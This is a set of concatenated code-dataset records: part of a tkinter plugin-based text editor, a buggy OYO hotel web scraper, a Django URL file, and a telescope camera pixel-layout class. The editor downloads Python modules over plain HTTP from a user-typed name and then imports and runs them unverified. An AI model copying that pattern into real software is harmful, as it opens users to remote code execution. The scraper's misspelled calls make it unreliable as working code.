tkinter.END+'-1c')\r\n if data != \"\":\r\n if tkinter.messagebox.askokcancel(\"Discard\", \"Do you really want to discard unsaved changes?\"):\r\n self.textPad.delete('1.0', tkinter.END)\r\n\r\n def openCommand(self):\r\n data = self.textPad.get('1.0', tkinter.END+'-1c')\r\n if data != \"\":\r\n if tkinter.messagebox.askokcancel(\"Discard\", \"Do you really want to discard unsaved changes?\"):\r\n self.textPad.delete('1.0', tkinter.END)\r\n else:\r\n return\r\n file = tkinter.filedialog.askopenfile(parent=self.root,mode='rb',title='Select a file')\r\n if file != None:\r\n contents = file.read()\r\n self.textPad.insert('1.0', contents)\r\n self.name = file.name\r\n self.root.title(\"Blu's Modular Editor 0.2.0: \" + self.name)\r\n file.close()\r\n\r\n def saveCommand(self):\r\n file = tkinter.filedialog.asksaveasfile(mode='w')\r\n if file != None:\r\n # slice off the last character from get, as an extra return is added\r\n data = self.textPad.get('1.0', tkinter.END+'-1c')\r\n file.write(data)\r\n self.name = file.name\r\n self.root.title(\"Blu's Modular Editor 0.2.0: \" + self.name)\r\n file.close()\r\n\r\n def restartCommand(self):\r\n data = self.textPad.get('1.0', tkinter.END+'-1c')\r\n with open(os.path.join(self.path, \"..\", \"restart.tmp\"), \"w+\") as outfile:\r\n outfile.write(self.name + \"\\n\" + data)\r\n self.root.quit()\r\n\r\n def exitCommand(self):\r\n data = self.textPad.get('1.0', tkinter.END+'-1c')\r\n if data != \"\":\r\n if not tkinter.messagebox.askokcancel(\"Quit\", \"Do you really want to discard unsaved changes?\"):\r\n return\r\n self.root.destroy()\r\n\r\n def aboutCommand(self):\r\n tkinter.messagebox.showinfo(\"About\", \"A modular text editor by BluCode.\")\r\n\r\n def downloadModuleCommand(self):\r\n self.popup = popupWindow(self.root, \"Please enter the module name to add.\")\r\n self.root.wait_window(self.popup.top)\r\n self.popup.value = self.popup.value.lower()\r\n if self.popup.value != \"main\":\r\n redl = False\r\n try:\r\n with open(os.path.join(self.path, self.popup.value + \".py\"), \"r\") as _:\r\n if tkinter.messagebox.askyesno(\"Error\", \"This module has already been downloaded.\\nWould you like to re-download it?\"):\r\n redl = True\r\n raise FileNotFoundError\r\n except FileNotFoundError:\r\n try:\r\n urllib.request.urlretrieve(\"http://github.com/BluCodeGH/Editor/modules/\" + self.popup.value + \".py\", os.path.join(self.path, self.popup.value + \".py\"))\r\n if not redl:\r\n self.loadModuleCommand(self.popup.value)\r\n else:\r\n self.restartCommand()\r\n except urllib.request.URLError:\r\n tkinter.messagebox.showinfo(\"Error\", \"Invalid module name.\")\r\n else:\r\n try:\r\n urllib.request.urlretrieve(\"http://github.com/BluCodeGH/Editor/main.py\", os.path.join(self.path, \"..\", \"main.py\"))\r\n self.restartCommand()\r\n except urllib.request.URLError:\r\n tkinter.messagebox.showinfo(\"Error\", \"Something went wrong...\\nRIP\")\r\n\r\n def loadModuleCommand(self, module=None):\r\n if module is None:\r\n self.popup = popupWindow(self.root, \"Please enter the module name to load.\")\r\n self.root.wait_window(self.popup.top)\r\n module = self.popup.value\r\n if module in sys.modules.keys():\r\n tkinter.messagebox.showinfo(\"Error\", \"Module already loaded.\")\r\n return\r\n print(\"Trying to load module \" + module + \".\")\r\n try:\r\n pkg = importlib.import_module(\"modules.\" + module)\r\n self.root, self.textPad, self.menu = pkg.main(self.root, self.textPad, self.menu).ret()\r\n print(\"Updating modules file.\")\r\n with open(\"modules.json\", \"r\") as infile:\r\n modules = json.loads(infile.read())\r\n if module not in modules:\r\n modules.append(module)\r\n with open(\"modules.json\", \"w+\") as file:\r\n file.write(json.dumps(modules))\r\n print(\"Module loaded successfully.\")\r\n except ModuleNotFoundError:\r\n tkinter.messagebox.showinfo(\"Error\", \"Invalid module name.\")\r\n\r\n def unloadModuleCommand(self, module=None):\r\n if module is None:\r\n self.popup = popupWindow(self.root, \"Please enter the module name to unload.\")\r\n self.root.wait_window(self.popup.top)\r\n module = self.popup.value\r\n print(\"Updating modules file.\")\r\n with open(\"modules.json\", \"r\") as infile:\r\n modules = json.loads(infile.read())\r\n if module in modules:\r\n modules.remove(module)\r\n with open(\"modules.json\", \"w+\") as file:\r\n file.write(json.dumps(modules))\r\n print(\"Module unloaded successfully.\")\r\n self.restartCommand()\r\n else:\r\n tkinter.messagebox.showinfo(\"Error\", \"Module was never loaded.\")\r\n","sub_path":"modules/essentials.py","file_name":"essentials.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"495170829","text":"#project 2: web scrapping using beautifulSoup 4 and requests\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas\r\nimport argparse\r\nimport connect\r\n\r\nparser=argparse.ArgumentParser()\r\nparser.add_arguement(\"--page_num_max\", help=\"enter the number of pages to parse\", type=int)\r\nparser.add_arguement(\"--dbname\", help=\"Enter the name of db\", type=str)\r\nargs=parser.parse_args()\r\n\r\noyo_url =\"https://www.oyorooms.com/hotels-in-mumbai/?page=\"\r\npage_num_MAX=3\r\nscrapped_info_list=[]\r\nconnect.connect(args.dbname)\r\n\r\nfor page_num in range (1,page_num_MAX):\r\n url=oyo_url+ str(page_num)\r\n print(\"GET Requests for:\"+url)\r\n req= requests.get(url)\r\n content=req.content\r\n\r\n soup = BeautifulSoup(content,\"html.parser\")\r\n\r\n all_hotels = soup.find_all(\"div\",{\"class\":\"hotelCardListing\"})\r\n\r\n for hotel in all_hotels:\r\n hotel_dict = {}\r\n hotel_dict[\"name\"]=hotel.find(\"h3\",{\"class\":\"listingHotelDescription__hotelName\"}).text\r\n hotel_dict[\"address\"]=hotel.find(\"span\",{\"itemprop\":\"streetAddress\"}).text\r\n hotel_dict[\"price\"]=hotel.find(\"span\",{\"class\": \"listiingPrice__finalPrice\"}).text\r\n #try ... except\r\n try:\r\n hotel_dict[\"rating\"]=hotel.find(\"span\",{\"class\":\"hotelRating__ratingSummary\"}).text\r\n except AttributeError:\r\n hotel_dict[\"rating\"]=None\r\n parent_amenities_elements= hotel.find(\"div\",{\"class\":\"amenityWrapper\"})\r\n amenities_list=[]\r\n for amenity in parent_amenities_elements.find_all(\"div\",{\"class\":\"amenityWrapper__amenity\"}):\r\n amenities_list.append(amenity.find(\"span\", {\"class\":\"d-body-smd-textEllipsis\"}).text.strip())\r\n hotel_dict[\"amenities\"]=','.join(amenities_list[:-1])\r\n scrapped_info_list.append(hotel_dict)\r\n connect.insert_into_table(args.dbname,tuple(hotel_dict.value()))\r\n # print(hotel_name,hotel_address,hotel_price,hotel_rating)\r\ndataFrame = pandas.DataFrame(scrapped_info_list)\r\nprint(\"creating csv file...\")\r\ndataFrame.to_csv(\"Oyo.csv\")\r\nconnect.get_hotel_info(args.dbname)\r\n","sub_path":"webscrapping.py","file_name":"webscrapping.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"126535554","text":"from django.urls import path\nfrom .views import *\n\napp_name = 'admin_blog'\n\nurlpatterns = [\n path('listar_posts/', listar_posts, name='listar_posts'),\n path('editar_post/', editar_post, name='editar_post'),\n path('remover_post/', remover_post, name='remover_post'),\n path('cadastrar_post/', cadastrar_post, name='cadastrar_post'),\n\n]","sub_path":"admin_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"116146339","text":"import logging\n\nimport astropy.units as u\nimport matplotlib as mlp\nimport matplotlib.colors as mcolors\nimport matplotlib.patches as mpatches\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.collections import PatchCollection\nfrom scipy.spatial import cKDTree as KDTree\nfrom scipy.spatial import distance\n\nimport simtools.visualization.legend_handlers as leg_h\nfrom simtools.model.model_utils import (\n get_camera_name,\n get_telescope_class,\n is_two_mirror_telescope,\n)\nfrom simtools.util.general import rotate\n\n__all__ = [\"Camera\"]\n\n\nclass Camera:\n \"\"\"\n Camera class, defining pixel layout including rotation, finding neighbour pixels, calculating\\\n FoV and plotting the camera.\n\n Parameters\n ----------\n telescope_model_name: string\n As provided by the telescope model method TelescopeModel (ex South-LST-1).\n camera_config_file: string\n The sim_telarray file name.\n focal_length: float\n The focal length of the camera in (preferably the effective focal length), assumed to be \\\n in the same unit as the pixel positions in the camera_config_file, usually cm.\n \"\"\"\n\n # Constants for finding neighbour pixels.\n PMT_NEIGHBOR_RADIUS_FACTOR = 1.1\n SIPM_NEIGHBOR_RADIUS_FACTOR = 1.4\n SIPM_ROW_COLUMN_DIST_FACTOR = 0.2\n\n def __init__(self, telescope_model_name, camera_config_file, focal_length):\n \"\"\"\n Initialize Camera class, defining pixel layout including rotation, finding neighbour pixels,\n calculating FoV and plotting the camera.\n \"\"\"\n\n self._logger = logging.getLogger(__name__)\n\n self._telescope_model_name = telescope_model_name\n self._camera_name = get_camera_name(self._telescope_model_name)\n self._camera_config_file = camera_config_file\n self._focal_length = focal_length\n if self._focal_length <= 0:\n raise ValueError(\"The focal length must be larger than zero\")\n self._pixels = self.read_pixel_list(camera_config_file)\n\n self._pixels = self._rotate_pixels(self._pixels)\n\n # Initialize an empty list of neighbours, to be calculated only when necessary.\n self._neighbours = None\n\n # Initialize an empty list of edge pixels, to be calculated only when necessary.\n self._edge_pixel_indices = None\n\n @staticmethod\n def read_pixel_list(camera_config_file):\n \"\"\"\n Read the pixel layout from the camera config file, assumed to be in a sim_telarray format.\n\n Parameters\n ----------\n camera_config_file: string\n The sim_telarray file name.\n\n Returns\n -------\n dict: pixels\n A dictionary with the pixel positions, the camera rotation angle, the pixel shape, \\\n the pixel diameter, the pixel IDs and their \"on\" status.\n\n Notes\n -----\n The pixel shape can be hexagonal (denoted as 1 or 3) or a square (denoted as 2). \\\n The hexagonal shapes differ in their orientation, where those denoted as 3 are rotated\n clockwise by 30 degrees with respect to those denoted as 1.\n \"\"\"\n\n pixels = dict()\n pixels[\"pixel_diameter\"] = 9999\n pixels[\"pixel_shape\"] = 9999\n pixels[\"pixel_spacing\"] = 9999\n pixels[\"lightguide_efficiency_angle_file\"] = \"none\"\n pixels[\"lightguide_efficiency_wavelength_file\"] = \"none\"\n pixels[\"rotate_angle\"] = 0\n pixels[\"x\"] = list()\n pixels[\"y\"] = list()\n pixels[\"pix_id\"] = list()\n pixels[\"pix_on\"] = list()\n\n with open(camera_config_file, \"r\") as dat_file:\n for line in dat_file:\n pix_info = line.split()\n if line.startswith(\"PixType\"):\n pixels[\"pixel_shape\"] = int(pix_info[5].strip())\n pixels[\"pixel_diameter\"] = float(pix_info[6].strip())\n pixels[\"lightguide_efficiency_angle_file\"] = (\n pix_info[8].strip().replace('\"', \"\")\n )\n if len(pix_info) > 9:\n pixels[\"lightguide_efficiency_wavelength_file\"] = (\n pix_info[9].strip().replace('\"', \"\")\n )\n if line.startswith(\"Rotate\"):\n pixels[\"rotate_angle\"] = np.deg2rad(float(pix_info[1].strip()))\n if line.startswith(\"Pixel\"):\n pixels[\"x\"].append(float(pix_info[3].strip()))\n pixels[\"y\"].append(float(pix_info[4].strip()))\n pixels[\"pix_id\"].append(int(pix_info[1].strip()))\n if len(pix_info) > 9:\n if int(pix_info[9].strip()) != 0:\n pixels[\"pix_on\"].append(True)\n else:\n pixels[\"pix_on\"].append(False)\n else:\n pixels[\"pix_on\"].append(True)\n\n if pixels[\"pixel_diameter\"] == 9999:\n raise ValueError(f\"Could not read the pixel diameter from {camera_config_file} file\")\n if pixels[\"pixel_shape\"] not in [1, 2, 3]:\n raise ValueError(\n f\"Pixel shape in {camera_config_file} unrecognized (has to be 1, 2 or 3)\"\n )\n\n return pixels\n\n def _rotate_pixels(self, pixels):\n \"\"\"\n Rotate the pixels according to the rotation angle given in pixels['rotate_angle'].\n Additional rotation is added to get to the camera view of an observer facing the camera.\n The angle for the axes rotation depends on the coordinate system in which the original\n data was provided.\n\n Parameters\n ----------\n pixels: dictionary\n The dictionary produced by the read_pixel_list method of this class\n\n Returns\n -------\n pixels: dict\n The pixels dictionary with rotated pixels.\n The pixels orientation for plotting is added to the dictionary in pixels['orientation'].\n The orientation is determined by the pixel shape (see read_pixel_list for details).\n \"\"\"\n\n rotate_angle = pixels[\"rotate_angle\"] * u.rad # So not to change the original angle\n # The original pixel list is given such that\n # x -> North, y -> West, z -> Up in the ground system.\n # At azimuth=0, zenith angle=0 all coordinate systems are aligned.\n # When the telescope turns the \"normal\" way towards\n # the horizon, the x-axis points downwards, the y-axis points right\n # (when looking from the camera onto the dish),\n # and the z-axis points in any case from (primary) dish towards camera.\n # To get the camera for an observer facing the camera, need to rotate by 90 degrees.\n rotate_angle += (90 * u.deg).to(u.rad)\n\n self._logger.debug(f\"Rotating pixels by {rotate_angle.to(u.deg)} (clockwise rotation)\")\n\n if rotate_angle != 0:\n pixels[\"x\"], pixels[\"y\"] = rotate(pixels[\"x\"], pixels[\"y\"], rotate_angle)\n\n pixels[\"orientation\"] = 0\n if pixels[\"pixel_shape\"] == 1 or pixels[\"pixel_shape\"] == 3:\n if pixels[\"pixel_shape\"] == 3:\n pixels[\"orientation\"] = 30\n if rotate_angle > 0:\n pixels[\"orientation\"] -= rotate_angle.to(u.deg).value\n\n return pixels\n\n def get_number_of_pixels(self):\n \"\"\"\n Get the number of pixels in the camera (all pixels, including those defined as \"off\".\n\n Returns\n -------\n int\n number of pixels.\n \"\"\"\n\n return len(self._pixels[\"x\"])\n\n def get_pixel_diameter(self):\n \"\"\"\n Get pixel diameter contained in _pixels.\n\n Returns\n -------\n float\n Pixel diameter (usually in cm).\n \"\"\"\n\n return self._pixels[\"pixel_diameter\"]\n\n def get_pixel_active_solid_angle(self):\n \"\"\"\n Get the active solid angle of a pixel in sr.\n\n Returns\n -------\n float\n active solid angle of a pixel in sr.\n \"\"\"\n\n pixel_area = self.get_pixel_diameter() ** 2\n # In case we have hexagonal pixels:\n if self.get_pixel_shape() == 1 or self.get_pixel_shape() == 3:\n pixel_area *= np.sqrt(3) / 2\n return pixel_area / (self._focal_length**2)\n\n def get_pixel_shape(self):\n \"\"\"\n Get pixel shape code 1, 2 or 3, where 1 and 3 are hexagonal pixels, where one is rotated by\\\n 30 degrees with respect to the other. A square pixel is denoted as 2.\n\n Returns\n -------\n int (1, 2 or 3)\n Pixel shape.\n \"\"\"\n return self._pixels[\"pixel_shape\"]\n\n def get_lightguide_efficiency_angle_file_name(self):\n \"\"\"\n Get the file name of the light guide efficiency as a function of incidence angle.\n\n Returns\n -------\n str\n File name of the light guide efficiency as a function of incidence angle.\n \"\"\"\n\n return self._pixels[\"lightguide_efficiency_angle_file\"]\n\n def get_lightguide_efficiency_wavelength_file_name(self):\n \"\"\"\n Get the file name of the light guide efficiency as a function of wavelength.\n\n Returns\n -------\n str\n File name of the light guide efficiency as a function of wavelength.\n \"\"\"\n return self._pixels[\"lightguide_efficiency_wavelength_file\"]\n\n def get_camera_fill_factor(self):\n \"\"\"\n Calculate the fill factor of the camera, defined as (pixel_diameter/pixel_spacing)**2\n\n Returns\n -------\n float\n The camera fill factor.\n \"\"\"\n\n if self._pixels[\"pixel_spacing\"] == 9999:\n points = np.array([self._pixels[\"x\"], self._pixels[\"y\"]]).T\n pixel_distances = distance.cdist(points, points, \"euclidean\")\n self._pixels[\"pixel_spacing\"] = np.min(pixel_distances[pixel_distances > 0])\n\n return (self._pixels[\"pixel_diameter\"] / self._pixels[\"pixel_spacing\"]) ** 2\n\n def calc_fov(self):\n \"\"\"\n Calculate the FOV of the camera in degrees, taking into account the focal length.\n\n Returns\n -------\n fov: float\n The FOV of the camera in the degrees.\n average_edge_distance: float\n The average edge distance of the camera.\n\n Notes\n -----\n The x,y pixel positions and focal length are assumed to have the same unit (usually cm)\n \"\"\"\n\n self._logger.debug(\"Calculating the FoV\")\n\n return self._calc_fov(\n self._pixels[\"x\"],\n self._pixels[\"y\"],\n self.get_edge_pixels(),\n self._focal_length,\n )\n\n def _calc_fov(self, x_pixel, y_pixel, edge_pixel_indices, focal_length):\n \"\"\"\n Calculate the FOV of the camera in degrees, taking into account the focal length.\n\n Parameters\n ----------\n x_pixel: list\n List of positions of the pixels on the x-axis\n y_pixel: list\n List of positions of the pixels on the y-axis\n edge_pixel_indices: list\n List of indices of the edge pixels\n focal_length: float\n The focal length of the camera in (preferably the effective focal length), assumed to \\\n be in the same unit as the pixel positions.\n\n Returns\n -------\n fov: float\n The FOV of the camera in the degrees.\n average_edge_distance: float\n The average edge distance of the camera\n\n Notes\n -----\n The x,y pixel positions and focal length are assumed to have the same unit (usually cm)\n \"\"\"\n\n self._logger.debug(\"Calculating the FoV\")\n\n average_edge_distance = 0\n for i_pix in edge_pixel_indices:\n average_edge_distance += np.sqrt(x_pixel[i_pix] ** 2 + y_pixel[i_pix] ** 2)\n average_edge_distance /= len(edge_pixel_indices)\n\n fov = 2 * np.rad2deg(np.arctan(average_edge_distance / focal_length))\n\n return fov, average_edge_distance\n\n @staticmethod\n def _find_neighbours(x_pos, y_pos, radius):\n \"\"\"\n use a KD-Tree to quickly find nearest neighbours (e.g., of the pixels in a camera or mirror\\\n facets)\n\n Parameters\n ----------\n x_pos : numpy.array_like\n x position of each e.g., pixel\n y_pos : numpy.array_like\n y position of each e.g., pixel\n radius : float\n radius to consider neighbour it should be slightly larger than the pixel diameter or \\\n mirror facet.\n\n Returns\n -------\n neighbours: numpy.array_like\n Array of neighbour indices in a list for each e.g., pixel.\n \"\"\"\n\n points = np.array([x_pos, y_pos]).T\n indices = np.arange(len(x_pos))\n kdtree = KDTree(points)\n neighbours = [kdtree.query_ball_point(p, r=radius) for p in points]\n\n for neighbour_now, index_now in zip(neighbours, indices):\n neighbour_now.remove(index_now) # get rid of the pixel or mirror itself\n\n return neighbours\n\n def _find_adjacent_neighbour_pixels(self, x_pos, y_pos, radius, row_coloumn_dist):\n \"\"\"\n Find adjacent neighbour pixels in cameras with square pixels. Only directly adjacent \\\n neighbours are allowed, no diagonals.\n\n Parameters\n ----------\n x_pos : numpy.array_like\n x position of each pixel\n y_pos : numpy.array_like\n y position of each pixels\n radius : float\n radius to consider neighbour.\n Should be slightly larger than the pixel diameter.\n row_coloumn_dist : float\n Maximum distance for pixels in the same row/column to consider when looking for a \\\n neighbour. Should be around 20% of the pixel diameter.\n\n Returns\n -------\n neighbours: numpy.array_like\n Array of neighbour indices in a list for each pixel\n \"\"\"\n\n # First find the neighbours with the usual method and the original radius\n # which does not allow for diagonal neighbours.\n neighbours = self._find_neighbours(x_pos, y_pos, radius)\n for i_pix, nn in enumerate(neighbours):\n # Find pixels defined as edge pixels now\n if len(nn) < 4:\n # Go over all other pixels and search for ones which are adjacent\n # but further than sqrt(2) away\n for j_pix, _ in enumerate(x_pos):\n # No need to look at the pixel itself\n # nor at any pixels already in the neighbours list\n if j_pix != i_pix and j_pix not in nn:\n dist = np.sqrt(\n (x_pos[i_pix] - x_pos[j_pix]) ** 2 + (y_pos[i_pix] - y_pos[j_pix]) ** 2\n )\n # Check if this pixel is in the same row or column\n # and allow it to be ~1.68*diameter away (1.4*1.2 = 1.68)\n # Need to increase the distance because of the curvature\n # of the CHEC camera\n if (\n abs(x_pos[i_pix] - x_pos[j_pix]) < row_coloumn_dist\n or abs(y_pos[i_pix] - y_pos[j_pix]) < row_coloumn_dist\n ) and dist < 1.2 * radius:\n nn.append(j_pix)\n\n return neighbours\n\n def _calc_neighbour_pixels(self, pixels):\n \"\"\"\n Find adjacent neighbour pixels in cameras with hexagonal or square pixels. Only directly \\\n adjacent neighbours are searched for, no diagonals.\n\n Parameters\n ----------\n pixels: dictionary\n The dictionary produced by the read_pixel_list method of this class\n\n Returns\n -------\n neighbours: numpy.array_like\n Array of neighbour indices in a list for each pixel\n \"\"\"\n\n self._logger.debug(\"Searching for neighbour pixels\")\n\n if pixels[\"pixel_shape\"] == 1 or pixels[\"pixel_shape\"] == 3:\n self._neighbours = self._find_neighbours(\n pixels[\"x\"],\n pixels[\"y\"],\n self.PMT_NEIGHBOR_RADIUS_FACTOR * pixels[\"pixel_diameter\"],\n )\n elif pixels[\"pixel_shape\"] == 2:\n # Distance increased by 40% to take into account gaps in the SiPM cameras\n # Pixels in the same row/column can be 20% shifted from one another\n # Inside find_adjacent_neighbour_pixels the distance is increased\n # further for pixels in the same row/column to 1.68*diameter.\n self._neighbours = self._find_adjacent_neighbour_pixels(\n pixels[\"x\"],\n pixels[\"y\"],\n self.SIPM_NEIGHBOR_RADIUS_FACTOR * pixels[\"pixel_diameter\"],\n self.SIPM_ROW_COLUMN_DIST_FACTOR * pixels[\"pixel_diameter\"],\n )\n\n return self._neighbours\n\n def get_neighbour_pixels(self, pixels=None):\n \"\"\"\n Get a list of neighbour pixels by calling calc_neighbour_pixels() when necessary. The \\\n purpose of this function is to ensure the calculation occurs only once and only when \\\n necessary.\n\n Parameters\n ----------\n pixels: dict\n The dictionary produced by the read_pixel_list method of this class.\n\n Returns\n -------\n neighbours: numpy.array_like\n Array of neighbour indices in a list for each pixel.\n \"\"\"\n\n if self._neighbours is None:\n if pixels is None:\n pixels = self._pixels\n return self._calc_neighbour_pixels(pixels)\n\n return self._neighbours\n\n def _calc_edge_pixels(self, pixels, neighbours):\n \"\"\"\n Find the edge pixels of the camera.\n\n Parameters\n ----------\n pixels: dictionary\n The dictionary produced by the read_pixel_list method of this class.\n neighbours: numpy.array_like\n Array of neighbour indices in a list for each pixel.\n\n Returns\n -------\n edge_pixel_indices: numpy.array_like\n Array of edge pixel indices.\n \"\"\"\n\n self._logger.debug(\"Searching for edge pixels\")\n\n edge_pixel_indices = list()\n\n for i_pix, _ in enumerate(pixels[\"x\"]):\n if pixels[\"pixel_shape\"] == 1 or pixels[\"pixel_shape\"] == 3:\n if pixels[\"pix_on\"][i_pix]:\n if len(neighbours[i_pix]) < 6:\n edge_pixel_indices.append(i_pix)\n elif pixels[\"pixel_shape\"] == 2:\n if pixels[\"pix_on\"][i_pix]:\n if len(neighbours[i_pix]) < 4:\n edge_pixel_indices.append(i_pix)\n\n return edge_pixel_indices\n\n def get_edge_pixels(self, pixels=None, neighbours=None):\n \"\"\"\n Get the indices of the edge pixels of the camera.\n\n Parameters\n ----------\n pixels: dict\n The dictionary produced by the read_pixel_list method of this class.\n neighbours: numpy.array_like\n Array of neighbour indices in a list for each pixel.\n\n Returns\n -------\n edge_pixel_indices: numpy.array_like\n Array of edge pixel indices.\n \"\"\"\n\n if self._edge_pixel_indices is None:\n if pixels is None:\n pixels = self._pixels\n if neighbours is None:\n neighbours = self.get_neighbour_pixels()\n return self._calc_edge_pixels(pixels, neighbours)\n\n return self._edge_pixel_indices\n\n def _plot_axes_def(self, plot, rotate_angle):\n \"\"\"\n Plot three axes definitions on the pyplot.plt instance provided. The three axes are Alt/Az,\\\n the camera coordinate system and the original coordinate system the pixel list was provided.\n\n Parameters\n ----------\n plot: pyplot.plt instance\n A pyplot.plt instance where to add the axes definitions.\n rotate_angle: float\n The rotation angle applied\n \"\"\"\n\n invert_yaxis = False\n x_left = 0.7 # Position of the left most axis\n if not is_two_mirror_telescope(self._telescope_model_name):\n invert_yaxis = True\n x_left = 0.8\n\n x_title = r\"$x_{\\!pix}$\"\n y_title = r\"$y_{\\!pix}$\"\n x_pos, y_pos = (x_left, 0.12)\n # The rotation of LST (above 100 degrees) raises the axes.\n # In this case, lower the starting point.\n if np.rad2deg(rotate_angle) > 100:\n y_pos -= 0.09\n x_pos -= 0.05\n kwargs = {\n \"x_title\": x_title,\n \"y_title\": y_title,\n \"x_pos\": x_pos,\n \"y_pos\": y_pos,\n \"rotate_angle\": rotate_angle - (1 / 2.0) * np.pi,\n \"fc\": \"black\",\n \"ec\": \"black\",\n \"invert_yaxis\": invert_yaxis,\n }\n self._plot_one_axis_def(plot, **kwargs)\n\n x_title = r\"$x_{\\!cam}$\"\n y_title = r\"$y_{\\!cam}$\"\n x_pos, y_pos = (x_left + 0.15, 0.12)\n kwargs = {\n \"x_title\": x_title,\n \"y_title\": y_title,\n \"x_pos\": x_pos,\n \"y_pos\": y_pos,\n \"rotate_angle\": (3 / 2.0) * np.pi,\n \"fc\": \"blue\",\n \"ec\": \"blue\",\n \"invert_yaxis\": invert_yaxis,\n }\n self._plot_one_axis_def(plot, **kwargs)\n\n x_title = \"Alt\"\n y_title = \"Az\"\n x_pos, y_pos = (x_left + 0.15, 0.25)\n kwargs = {\n \"x_title\": x_title,\n \"y_title\": y_title,\n \"x_pos\": x_pos,\n \"y_pos\": y_pos,\n \"rotate_angle\": (3 / 2.0) * np.pi,\n \"fc\": \"red\",\n \"ec\": \"red\",\n \"invert_yaxis\": invert_yaxis,\n }\n self._plot_one_axis_def(plot, **kwargs)\n\n @staticmethod\n def _plot_one_axis_def(plot, **kwargs):\n \"\"\"\n Plot an axis on the pyplot.plt instance provided.\n\n Parameters\n ----------\n plot: pyplot.plt instance\n A pyplot.plt instance where to add the axes definitions.\n **kwargs: dict\n x_title: str\n x-axis title\n y_title: str\n y-axis title,\n x_pos: float\n x position of the axis to draw\n y_pos: float\n y position of the axis to draw\n rotate_angle: float\n rotation angle of the axis in radians\n fc: str\n face colour of the axis\n ec: str\n edge colour of the axis\n invert_yaxis: bool\n Flag to invert the y-axis (for dual mirror telescopes).\n \"\"\"\n\n x_title = kwargs[\"x_title\"]\n y_title = kwargs[\"y_title\"]\n x_pos, y_pos = (kwargs[\"x_pos\"], kwargs[\"y_pos\"])\n\n r = 0.1 # size of arrow\n sign = 1.0\n if kwargs[\"invert_yaxis\"]:\n sign *= -1.0\n x_text1 = x_pos + sign * r * np.cos(kwargs[\"rotate_angle\"])\n y_text1 = y_pos + r * np.sin(0 + kwargs[\"rotate_angle\"])\n x_text2 = x_pos + sign * r * np.cos(np.pi / 2.0 + kwargs[\"rotate_angle\"])\n y_text2 = y_pos + r * np.sin(np.pi / 2.0 + kwargs[\"rotate_angle\"])\n\n plot.gca().annotate(\n x_title,\n xy=(x_pos, y_pos),\n xytext=(x_text1, y_text1),\n xycoords=\"axes fraction\",\n ha=\"center\",\n va=\"center\",\n size=\"xx-large\",\n arrowprops=dict(\n arrowstyle=\"<|-\", shrinkA=0, shrinkB=0, fc=kwargs[\"fc\"], ec=kwargs[\"ec\"]\n ),\n )\n\n plot.gca().annotate(\n y_title,\n xy=(x_pos, y_pos),\n xytext=(x_text2, y_text2),\n xycoords=\"axes fraction\",\n ha=\"center\",\n va=\"center\",\n size=\"xx-large\",\n arrowprops=dict(\n arrowstyle=\"<|-\", shrinkA=0, shrinkB=0, fc=kwargs[\"fc\"], ec=kwargs[\"ec\"]\n ),\n )\n\n def plot_pixel_layout(self, camera_in_sky_coor=False, pixels_id_to_print=50):\n \"\"\"\n Plot the pixel layout for an observer facing the camera. Including in the plot edge pixels,\\\n off pixels, pixel ID for the first 50 pixels, coordinate systems, FOV, focal length and the\\\n average edge radius.\n\n Returns\n -------\n fig: plt.figure instance\n Figure with the pixel layout.\n \"\"\"\n\n self._logger.info(f\"Plotting the {self._telescope_model_name} camera\")\n\n fig, ax = plt.subplots()\n plt.gcf().set_size_inches(8, 8)\n\n if not is_two_mirror_telescope(self._telescope_model_name):\n if not camera_in_sky_coor:\n self._pixels[\"y\"] = [(-1) * y_val for y_val in self._pixels[\"y\"]]\n\n on_pixels, edge_pixels, off_pixels = list(), list(), list()\n\n for i_pix, xy_pix_pos in enumerate(zip(self._pixels[\"x\"], self._pixels[\"y\"])):\n if self._pixels[\"pixel_shape\"] == 1 or self._pixels[\"pixel_shape\"] == 3:\n hexagon = mpatches.RegularPolygon(\n (xy_pix_pos[0], xy_pix_pos[1]),\n numVertices=6,\n radius=self._pixels[\"pixel_diameter\"] / np.sqrt(3),\n orientation=np.deg2rad(self._pixels[\"orientation\"]),\n )\n if self._pixels[\"pix_on\"][i_pix]:\n if len(self.get_neighbour_pixels()[i_pix]) < 6:\n edge_pixels.append(hexagon)\n else:\n on_pixels.append(hexagon)\n else:\n off_pixels.append(hexagon)\n elif self._pixels[\"pixel_shape\"] == 2:\n square = mpatches.Rectangle(\n (\n xy_pix_pos[0] - self._pixels[\"pixel_diameter\"] / 2.0,\n xy_pix_pos[1] - self._pixels[\"pixel_diameter\"] / 2.0,\n ),\n width=self._pixels[\"pixel_diameter\"],\n height=self._pixels[\"pixel_diameter\"],\n )\n if self._pixels[\"pix_on\"][i_pix]:\n if len(self.get_neighbour_pixels()[i_pix]) < 4:\n edge_pixels.append(square)\n else:\n on_pixels.append(square)\n else:\n off_pixels.append(square)\n\n if self._pixels[\"pix_id\"][i_pix] < pixels_id_to_print + 1:\n font_size = 4\n if get_telescope_class(self._telescope_model_name) == \"SCT\":\n font_size = 2\n plt.text(\n xy_pix_pos[0],\n xy_pix_pos[1],\n self._pixels[\"pix_id\"][i_pix],\n horizontalalignment=\"center\",\n verticalalignment=\"center\",\n fontsize=font_size,\n )\n\n ax.add_collection(\n PatchCollection(on_pixels, facecolor=\"none\", edgecolor=\"black\", linewidth=0.2)\n )\n ax.add_collection(\n PatchCollection(\n edge_pixels,\n facecolor=mcolors.to_rgb(\"brown\") + (0.5,),\n edgecolor=mcolors.to_rgb(\"black\") + (1,),\n linewidth=0.2,\n )\n )\n ax.add_collection(\n PatchCollection(off_pixels, facecolor=\"black\", edgecolor=\"black\", linewidth=0.2)\n )\n\n legend_objects = [leg_h.PixelObject(), leg_h.EdgePixelObject()]\n legend_labels = [\"Pixel\", \"Edge pixel\"]\n if isinstance(on_pixels[0], mlp.patches.RegularPolygon):\n legend_handler_map = {\n leg_h.PixelObject: leg_h.HexPixelHandler(),\n leg_h.EdgePixelObject: leg_h.HexEdgePixelHandler(),\n leg_h.OffPixelObject: 